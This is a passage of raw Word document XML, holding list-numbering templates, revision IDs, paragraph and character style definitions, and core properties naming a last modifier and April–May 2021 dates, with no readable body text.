    <w:nsid w:val="29DE60EB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E0467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2565144"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D396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06D23"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5C4642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5502D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="298C5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459A3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3BB28F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18E0E03"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="799E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29169F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="ECB4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7B5169"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BEAA1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63834"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D160D82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8" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="612223A2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="828C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A18F9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="74324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E57406B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F9B66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B55982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D2C55"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DCC6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5C37A6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="559C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D10CAE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="665EA9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17357B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D9402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22"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="12">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="13">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="14">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="15">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="16">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="17">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="18">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="19">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="20">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="21">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="22">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="23">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="24">
    <w:abstractNumId w:val="7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52"/>
    <w:rsid w:val="00042193"/>
    <w:rsid w:val="00057A24"/>
    <w:rsid w:val="00057DBB"/>
    <w:rsid w:val="00060F40"/>
    <w:rsid w:val="000627BA"/>
    <w:rsid w:val="00085EF1"/>
    <w:rsid w:val="00095B94"/>
    <w:rsid w:val="000E27EA"/>
    <w:rsid w:val="000E3023"/>
    <w:rsid w:val="00130B02"/>
    <w:rsid w:val="00146D6E"/>
    <w:rsid w:val="00172782"/>
    <w:rsid w:val="002412E2"/>
    <w:rsid w:val="00241928"/>
    <w:rsid w:val="002872E8"/>
    <w:rsid w:val="002C63BA"/>
    <w:rsid w:val="003029F1"/>
    <w:rsid w:val="003C6420"/>
    <w:rsid w:val="00425A47"/>
    <w:rsid w:val="00474F94"/>
    <w:rsid w:val="004761E6"/>
    <w:rsid w:val="004A67CD"/>
    <w:rsid w:val="004B4A36"/>
    <w:rsid w:val="004B50C9"/>
    <w:rsid w:val="0050497C"/>
    <w:rsid w:val="005150E7"/>
    <w:rsid w:val="00565CAF"/>
    <w:rsid w:val="00596A88"/>
    <w:rsid w:val="007C2E22"/>
    <w:rsid w:val="009320E1"/>
    <w:rsid w:val="00992490"/>
    <w:rsid w:val="009C2100"/>
    <w:rsid w:val="00A02908"/>
    <w:rsid w:val="00B25E8D"/>
    <w:rsid w:val="00B91DD6"/>
    <w:rsid w:val="00C00E03"/>
    <w:rsid w:val="00C279AB"/>
    <w:rsid w:val="00C66F52"/>
    <w:rsid w:val="00C8593A"/>
    <w:rsid w:val="00D17F9E"/>
    <w:rsid w:val="00D22796"/>
    <w:rsid w:val="00ED3846"/>
    <w:rsid w:val="00EF0232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F3E"/>
  <w15:docId w15:val="{6C5E7CCA-AEF3-4B6E-BE9C-8550424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66F52"/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="TableNormal">
    <w:name w:val="Table Normal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66F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79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C63BA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17F9E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C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22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w8qarf">
    <w:name w:val="w8qarf"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00042193"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="lrzxr">
    <w:name w:val="lrzxr"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00042193"/>
  </w:style>
  <w:style w:type="character" w:styleId="ab">
    <w:name w:val="FollowedHyperlink"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00042193"/>
    <w:rPr>
      <w:color w:val="800080" w:themeColor="followedHyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ac">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="a"/>
    <w:qFormat/>
    <w:rsid w:val="00425A47"/>
    <w:pPr>
      <w:suppressAutoHyphens/>
      <w:autoSpaceDN w:val="0"/>
      <w:ind w:left="720"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Calibri"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Standard">
    <w:name w:val="Standard"/>
    <w:rsid w:val="00425A47"/>
    <w:pPr>
      <w:suppressAutoHyphens/>
      <w:autoSpaceDN w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Calibri"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Textbody">
    <w:name w:val="Text body"/>
    <w:basedOn w:val="Standard"/>
    <w:rsid w:val="000627BA"/>
    <w:pPr>
      <w:spacing w:after="140" w:line="276" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="11">
    <w:name w:val="toc 1"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="002872E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872E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1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9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8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5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7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8D07E-2F03-413B-845C-810763DD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Forbz</dc:creator>
  <cp:lastModifiedBy>Vladislav Kuzma</cp:lastModifiedBy>
  <cp:revision>4</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-04-29T11:33:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-05-03T15:51:00Z</dcterms:modified>
</cp:coreProperties>
</file>